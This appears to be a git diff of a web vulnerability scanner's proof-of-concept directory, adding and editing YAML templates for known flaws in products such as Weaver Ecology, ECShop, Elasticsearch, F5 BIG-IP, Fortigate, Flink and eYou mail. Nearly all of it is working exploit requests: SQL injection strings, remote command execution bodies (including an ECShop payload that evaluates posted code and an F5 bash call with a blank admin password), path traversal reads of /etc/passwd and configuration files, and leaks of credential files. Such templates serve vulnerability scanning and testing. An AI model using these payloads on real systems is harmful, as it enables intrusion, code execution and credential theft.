response.status == 200 && response.body.bcontains(b"<title>Dubbo Admin</title>") && response.body.bcontains(b": root', '/logout'") && response.body.bcontains(b"/sysinfo/versions")
guest:
- method: GET
path: /
headers:
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
expression: |
response.status == 200 && response.body.bcontains(b"<title>Dubbo Admin</title>") && response.body.bcontains(b": guest', '/logout'") && response.body.bcontains(b"/sysinfo/versions")
detail:
author: mumu0215(https://github.com/mumu0215)
links:
- https://www.cnblogs.com/wishwzp/p/9438658.html

13
WebScan/pocs/duomicms-sqli.yml Normal file
View File

@ -0,0 +1,13 @@
name: poc-yaml-duomicms-sqli
rules:
- method: GET
path: >-
/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005)))
follow_redirects: false
expression: |
response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935")
detail:
author: hanxiansheng26(https://github.com/hanxiansheng26)
Affected Version: "duomicms<3.0"
links:
- https://xz.aliyun.com/t/2828

15
WebScan/pocs/dvr-cve-2018-9995.yml Normal file
View File

@ -0,0 +1,15 @@
name: poc-yaml-dvr-cve-2018-9995
rules:
- method: GET
path: >-
/device.rsp?opt=user&cmd=list
headers:
Cookie: uid=admin
follow_redirects: true
expression: >
response.status == 200 && response.body.bcontains(bytes("\"uid\":")) && response.body.bcontains(b"playback")
detail:
author: cc_ci(https://github.com/cc8ci)
Affected Version: "DVR"
links:
- https://s.tencent.com/research/bsafe/474.html

10
WebScan/pocs/e-zkeco-cnvd-2020-57264-read-file.yml Normal file
View File

@ -0,0 +1,10 @@
name: poc-yaml-e-zkeco-cnvd-2020-57264-read-file
rules:
- method: GET
path: /iclock/ccccc/windows/win.ini
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:
author: ThestaRY (https://github.com/ThestaRY7/)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-57264
info: E-ZKEco readfileCNVD-2020-57264

11
WebScan/pocs/ecology-filedownload-directory-traversal.yml Normal file
View File

@ -0,0 +1,11 @@
name: poc-yaml-ecology-filedownload-directory-traversal
rules:
- method: GET
path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"<url-pattern>/weaver/")
detail:
author: l1nk3r
links:
- https://www.weaver.com.cn/cs/securityDownload.asp

16
WebScan/pocs/ecology-javabeanshell-rce.yml Normal file
View File

@ -0,0 +1,16 @@
name: poc-yaml-ecology-javabeanshell-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /weaver/bsh.servlet.BshServlet
body: >-
bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: l1nk3r
links:
- https://www.weaver.com.cn/cs/securityDownload.asp

11
WebScan/pocs/ecology-springframework-directory-traversal.yml Normal file
View File

@ -0,0 +1,11 @@
name: poc-yaml-ecology-springframework-directory-traversal
rules:
- method: GET
path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"<url-pattern>/weaver/")
detail:
author: l1nk3r
links:
- https://www.weaver.com.cn/cs/securityDownload.asp

15
WebScan/pocs/ecology-syncuserinfo-sqli.yml Normal file
View File

@ -0,0 +1,15 @@
name: poc-yaml-ecology-syncuserinfo-sqli
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: GET
path: >-
/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str({{r1}}*{{r2}}),null
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: MaxSecurity(https://github.com/MaxSecurity)
links:
- https://www.weaver.com.cn/

15
WebScan/pocs/ecology-v8-sqli.yml Normal file
View File

@ -0,0 +1,15 @@
name: poc-yaml-ecology-v8-sqli
set:
r1: randomInt(1000, 9999)
r2: randomInt(1000, 9999)
rules:
- method: GET
path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+{{r1}}*{{r2}}+as+id
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: Print1n(http://print1n.top)
links:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html

19
WebScan/pocs/ecology-workflowcentertreedata-sqli.yml Normal file
View File

@ -0,0 +1,19 @@
name: poc-yaml-ecology-workflowcentertreedata-sqli
set:
r1: randomInt(4000, 9999)
r2: randomInt(800, 1000)
rules:
- method: POST
path: /mobile/browser/WorkflowCenterTreeData.jsp
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
node=wftype_1132232323231&scope=23332323&formids=1111111111111%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a)))union+select+1024,({{r1}}*{{r2}})+order+by+(((1
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: JingLing(https://hackfun.org/)
links:
- https://anonfiles.com/A4cede8an1/_OA_WorkflowCenterTreeData_oracle_html
- https://mp.weixin.qq.com/s/9mpvppx3F-nTQYoPdY2r3w

32
WebScan/pocs/ecology-workflowservicexml.yml Normal file
View File

File diff suppressed because one or more lines are too long

14
WebScan/pocs/ecshop-collection-list-sqli.yml Normal file
View File

@ -0,0 +1,14 @@
name: poc-yaml-ecshop-collection-list-sqli
set:
r1: randomInt(10000, 99999)
rules:
- method: GET
path: /user.php?act=collection_list
headers:
X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:55:"1' and updatexml(1,insert(md5({{r1}}),1,1,0x7e),1) and '";|45ea207d7a2b68c49582d2d22adf953a
follow_redirects: false
expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 32)))
detail:
author: 曦shen
links:
- https://github.com/vulhub/vulhub/tree/master/ecshop/collection_list-sqli

28
WebScan/pocs/ecshop-rce.yml
View File

@ -2,15 +2,25 @@ name: poc-yaml-ecshop-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /user.php
headers:
Referer: >-
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
groups:
2.x:
- method: POST
path: /user.php
headers:
Referer: >-
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
3.x:
- method: POST
path: /user.php
headers:
Referer: >-
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: 凉风(http://webkiller.cn/)
links:

17
WebScan/pocs/ecshop-rce2.yml
View File

@ -1,17 +0,0 @@
name: poc-yaml-ecshop-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /user.php
headers:
Referer: >-
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: 凉风(http://webkiller.cn/)
links:
- https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md

11
WebScan/pocs/eea-info-leak-cnvd-2021-10543.yml Normal file
View File

@ -0,0 +1,11 @@
name: poc-yaml-eea-info-leak-cnvd-2021-10543
rules:
- method: GET
path: "/authenticationserverservlet"
expression: |
response.status == 200 && "<username>(.*?)</username>".bmatches(response.body) && "<password>(.*?)</password>".bmatches(response.body)
detail:
author: Search?=Null
description: "MessageSolution Enterprise Email Archiving (EEA) Info Leak."
links:
- https://exp1orer.github.io

45
WebScan/pocs/elasticsearch-cve-2014-3120.yml Normal file
View File

@ -0,0 +1,45 @@
name: poc-yaml-elasticsearch-cve-2014-3120
set:
r: randomInt(800000000, 1000000000)
r1: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /test/test1/123
headers:
Content-Type: application/json
body: |
{
"name": "test"
}
expression: |
response.status == 201 || response.status == 200
- method: POST
path: /_search
headers:
Content-Type: application/json
body: |-
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "{{r}}+{{r1}}"
}
}
}
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r + r1)))
detail:
author: suancaiyu、violin
elasticsearch: v1.1.1
links:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120

35
WebScan/pocs/elasticsearch-cve-2015-1427.yml Normal file
View File

@ -0,0 +1,35 @@
name: poc-yaml-elasticsearch-cve-2015-1427
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /test/test
headers:
Content-Type: application/json
body: |
{
"name": "test"
}
expression: |
response.status == 201
- method: POST
path: /_search
headers:
Content-Type: application/json
body: |
{
"size":1,
"script_fields":{
"lupin":{
"lang":"groovy",
"script":"{{r1}}*{{r2}}"
}
}
}
expression: |
response.status == 200 && response.content_type.icontains("json") && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: pululin(https://github.com/pululin)
links:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-1427

11
WebScan/pocs/elasticsearch-cve-2015-3337-lfi.yml Normal file
View File

@ -0,0 +1,11 @@
name: poc-yaml-elasticsearch-cve-2015-3337-lfi
rules:
- method: GET
path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: X.Yang
links:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337

42
WebScan/pocs/elasticsearch-cve-2015-5531.yml Normal file
View File

@ -0,0 +1,42 @@
name: poc-yaml-elasticsearch-cve-2015-5531
set:
r1: randomLowercase(4)
rules:
- method: PUT
path: /_snapshot/{{r1}}
headers:
Content-Type: application/x-www-form-urlencoded
body: |-
{
"type": "fs",
"settings":{
"location": "/usr/share/elasticsearch/repo/{{r1}}"
}
}
follow_redirects: true
expression: |
response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
- method: PUT
path: /_snapshot/{{r1}}2
headers:
Content-Type: application/x-www-form-urlencoded
body: |-
{
"type": "fs",
"settings":{
"location": "/usr/share/elasticsearch/repo/{{r1}}/snapshot-backdata"
}
}
follow_redirects: true
expression: |
response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
- method: GET
path: >-
/_snapshot/{{r1}}/backdata%2f..%2f..%2f..%2fconfig%2felasticsearch.yml
follow_redirects: true
expression: |
response.status == 400 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"error\":\"ElasticsearchParseException[Failed to derive xcontent from")
detail:
author: ha9worm(https://github.com/ha9worm)
links:
- https://www.cnblogs.com/sallyzhang/p/12457031.html

29
WebScan/pocs/etcd-unauth.yml Normal file
View File

@ -0,0 +1,29 @@
name: poc-yaml-etcd-unauth
set:
r1: randomLowercase(32)
r2: randomLowercase(32)
r3: randomLowercase(32)
rules:
- method: PUT
path: /v2/keys/{{r1}}?dir=true
follow_redirects: false
expression: |
response.status == 201
- method: PUT
path: /v2/keys/{{r1}}/{{r2}}?prevExist=false
headers:
Content-Type: application/x-www-form-urlencoded
body: value={{r3}}
follow_redirects: false
expression: |
response.status == 201
- method: GET
path: /v2/keys/{{r1}}/{{r2}}?quorum=false&recursive=false&sorted=false
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(r3))
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)
links:
- https://www.freebuf.com/news/196993.html

12
WebScan/pocs/etouch-v2-sqli.yml Normal file
View File

@ -0,0 +1,12 @@
name: poc-yaml-etouch-v2-sqli
rules:
- method: GET
path: >-
/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'
expression: |
response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b")
detail:
author: MaxSecurity(https://github.com/MaxSecurity)
links:
- https://github.com/mstxq17/CodeCheck/
- https://www.anquanke.com/post/id/168991

2
WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
View File

@ -6,7 +6,7 @@ rules:
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
follow_redirects: false
expression: |
"X-CalculatedBETarget" in response.headers && response.headers["X-CalculatedBETarget"].icontains("localhost")
response.headers["X-CalculatedBETarget"].icontains("localhost")
detail:
author: sharecast
Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"

13
WebScan/pocs/eyou-rce.yml
View File

@ -1,4 +1,4 @@
name: poc-yaml-eyou-rce
name: poc-yaml-eyou-email-system-rce
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
@ -7,9 +7,12 @@ rules:
path: /webadm/?q=moni_detail.do&action=gragh
headers:
Content-Type: application/x-www-form-urlencoded
body: type='|expr {{r1}} + {{r2}}||'
expression: response.body.bcontains(bytes(string(r1 + r2)))
body: |
type='|expr%20{{r1}}%20%2B%20{{r2}}||'
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: jingling(https://github.com/shmilylty)
author: Print1n(http://print1n.top)
description: 亿邮电子邮件系统 远程命令执行漏洞
links:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
- https://fengchenzxc.github.io/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%BA%BF%E9%82%AE/%E4%BA%BF%E9%82%AE%E7%94%B5%E5%AD%90%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/

20
WebScan/pocs/f5-cve-2021-22986.yml Normal file
View File

@ -0,0 +1,20 @@
name: poc-yaml-f5-cve-2021-22986
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /mgmt/tm/util/bash
headers:
Content-Type: application/json
Authorization: Basic YWRtaW46
X-F5-Auth-Token: " "
body: >-
{"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"}
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: Hex
links:
- https://support.f5.com/csp/article/K03009991

10
WebScan/pocs/feifeicms-lfr.yml Normal file
View File

@ -0,0 +1,10 @@
name: poc-yaml-feifeicms-lfr
rules:
- method: GET
path: /index.php?s=Admin-Data-down&id=../../Conf/config.php
expression: |
response.status == 200 && response.body.bcontains(b"<?php") && response.body.bcontains(b"db_name") && response.body.bcontains(b"db_pwd") && response.body.bcontains(b"db_host")
detail:
author: jinqi
links:
- https://www.cnblogs.com/jinqi520/p/10202615.html

13
WebScan/pocs/finecms-sqli.yml Normal file
View File

@ -0,0 +1,13 @@
name: poc-yaml-finecms-sqli
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({{rand}})%27
expression: |
response.body.bcontains(bytes(md5(string(rand))))
detail:
author: Rexus
Affected Version: "5.0.10"
links:
- https://blog.csdn.net/dfdhxb995397/article/details/101385340

11
WebScan/pocs/finereport-directory-traversal.yml Normal file
View File

@ -0,0 +1,11 @@
name: poc-yaml-finereport-directory-traversal
rules:
- method: GET
path: /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"<rootManagerName>") && response.body.bcontains(b"<rootManagerPassword>")
detail:
author: l1nk3r(http://www.lmxspace.com/)
links:
- http://foreversong.cn/archives/1378

38
WebScan/pocs/flexpaper-cve-2018-11686.yml Normal file
View File

@ -0,0 +1,38 @@
name: poc-yaml-flexpaper-cve-2018-11686
set:
fileName: randomLowercase(6)
verifyStr: randomLowercase(6)
rules:
- method: POST
path: /php/change_config.php
headers:
Content-Type: application/x-www-form-urlencoded
body: |
SAVE_CONFIG=1&PDF_Directory=a&SWF_Directory=config/&LICENSEKEY=a&SPLITMODE=a&RenderingOrder_PRIM=a&RenderingOrder_SEC=a
expression: |
response.status == 302 || response.status == 200
- method: POST
path: /php/change_config.php
headers:
Content-Type: application/x-www-form-urlencoded
body: |
SAVE_CONFIG=1&PDF_Directory=a&SWF_Directory=config/&LICENSEKEY=a&SPLITMODE=a&RenderingOrder_PRIM=a&RenderingOrder_SEC=a
expression: |
response.status == 302 || response.status == 200
- method: GET
path: >-
/php/setup.php?step=2&PDF2SWF_PATH=printf%20{{verifyStr}}%25%25{{verifyStr}}%20%3e%20{{fileName}}
follow_redirects: false
expression: |
response.status == 200
- method: GET
path: >-
/php/{{fileName}}pdf2swf
expression: |
response.status == 200 && response.body.bcontains(bytes(string(verifyStr + "%" + verifyStr)))
detail:
author: Soveless(https://github.com/Soveless)
Affected Version: "FlexPaper <= 2.3.6"
links:
- https://github.com/mpgn/CVE-2018-11686
- https://cloud.tencent.com/developer/article/1472550

10
WebScan/pocs/flink-jobmanager-cve-2020-17519-lfi.yml Normal file
View File

@ -0,0 +1,10 @@
name: poc-yaml-flink-jobmanager-cve-2020-17519-lfi
rules:
- method: GET
path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
expression: |
response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body)
detail:
author: MaxSecurity(https://github.com/MaxSecurity)
links:
- https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519

11
WebScan/pocs/flir-ax8-file-read.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-flir-ax8-file-read
rules:
- method: GET
path: "/download.php?file=/etc/passwd"
follow_redirects: false
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: Print1n(http://print1n.top)
links:
- https://juejin.cn/post/6961370156484263972

13
WebScan/pocs/fortigate-cve-2018-13379-readfile.yml Normal file
View File

@ -0,0 +1,13 @@
name: poc-yaml-fortigate-cve-2018-13379-readfile
rules:
- method: GET
path: "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
headers:
Content-Type: application/x-www-form-urlencoded
follow_redirects: true
expression: response.body.bcontains(bytes("fgt_lang")) && response.body.bcontains(bytes("Forticlient"))
detail:
author: tom0li(https://tom0li.github.io/)
links:
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html

Some files were not shown because too many files have changed in this diff Show More